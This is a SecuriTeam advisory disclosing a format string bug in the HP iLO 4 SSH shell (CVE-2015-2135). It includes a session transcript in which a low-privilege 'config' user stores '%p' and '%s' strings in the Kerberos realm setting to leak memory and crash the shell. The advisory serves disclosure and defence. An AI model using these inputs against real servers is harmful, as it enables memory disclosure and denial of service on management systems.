SSD Advisory – HP iLO Format String

SecuriTeam Secure Disclosure
SecuriTeam Secure Disclosure (SSD) provides the support you need to turn your experience uncovering security vulnerabilities into a highly paid career. SSD was designed by researchers for researchers and will give you the fast response and great support you need to make top dollar for your discoveries.
Introduction
HP Proliant Servers provide an embedded operating system running on a separate CPU called iLO (Integrated Lights Out). It provides various networking and management features for the server.
Vulnerability Details
HP iLO runs an SSH server by default, and users who log in are dropped into a special isolated type of shell. There is a format string vulnerability triggered by the “show” command which allows a low-level user account to cause a denial of service on the service or potentially execute arbitrary code.

Analysis
Users and Administrators for the server can login and are dropped into an isolated “hpiLO” shell. This shell is unlike a bash or sh environment and more like an isolated CLI. It exposes various commands and verbage to perform operations.
hp_ilo_image_1
A user with “config” privileges has the right to modify a set of configuration variables for the server. This privilege, while considered by iLO to be minimal (as seen below), is essential to provide a vector for triggering the bug.
hp_ilo_image_2
Selecting some other privileges for the user account above result in the privilege level being upgraded to “operator” or “administrator”. But, only “user” privileges, with “Configure iLO Settings” enabled will allow us to modify some variable to which we can “show” afterwards to trigger the format string.
Technical Details
Here’s a demonstration session logged in as user “test”. Output has been snipped for brevity.

</>hpiLO-> show -a /map1/accounts1
/map1/accounts1/Administrator
  Targets
  Properties
    username=Administrator
    password=********
    name=Administrator
    group=admin,config,oemhp_rc,oemhp_power,oemhp_vm
    sshkeyhash=<No SSH public key installed>
/map1/accounts1/test
  Targets
  Properties
    username=test
    password=********
    name=test
    group=config
    sshkeyhash=<No SSH public key installed>
</>hpiLO-> show /map1/oemhp_dircfg1 oemhp_dir_kerberos_realm
/map1/oemhp_dircfg1
  Properties
    oemhp_dir_kerberos_realm=test
Format String Trigger (Impact: Memory Disclosure)
</>hpiLO-> set /map1/oemhp_dircfg1 oemhp_dir_kerberos_realm="%p %p %p %p"
Directory settings modified.
</>hpiLO-> show /map1/oemhp_dircfg1 oemhp_dir_kerberos_realm
/map1/oemhp_dircfg1
  Properties
    oemhp_dir_kerberos_realm=0 976e 0 25207025
Format String Trigger (Impact: Denial of Service)
</>hpiLO-> set /map1/oemhp_dircfg1 oemhp_dir_kerberos_realm="%s%s%s%s"
Directory settings modified.
</>hpiLO-> show /map1/oemhp_dircfg1 oemhp_dir_kerberos_realm
/map1/oemhp_dircfg1
  Properties
[…. shell stops responding]

If we disconnect and log back in, the shell will not respond to commands. Without root access to the machine, it’s hard to say what privileges the shell is running under. But, we can make an infer that it’s running at a different, likely higher (possibly root) privileged account, as triggering the bug and crashing the shell as user “test” has the same unresponsive effect on “administrator”. Eg. Disconnecting the session and re-logging back in after the DoS trigger leaves an unresponsive shell with “test” and “administrator” alike.
Affected Versions
HP iLO version 4 firmware v2.0
HP iLO version 4 Advanced firmware v2.0
Vendor Response
The vendor has been notified on July 2015 and have released a patch for this vulnerability, HP Intelligent Provisioning, Remote Code Execution, Unauthorized Access.
CVE
A single CVE entry has been assigned to this vulnerability, CVE-2015-2135.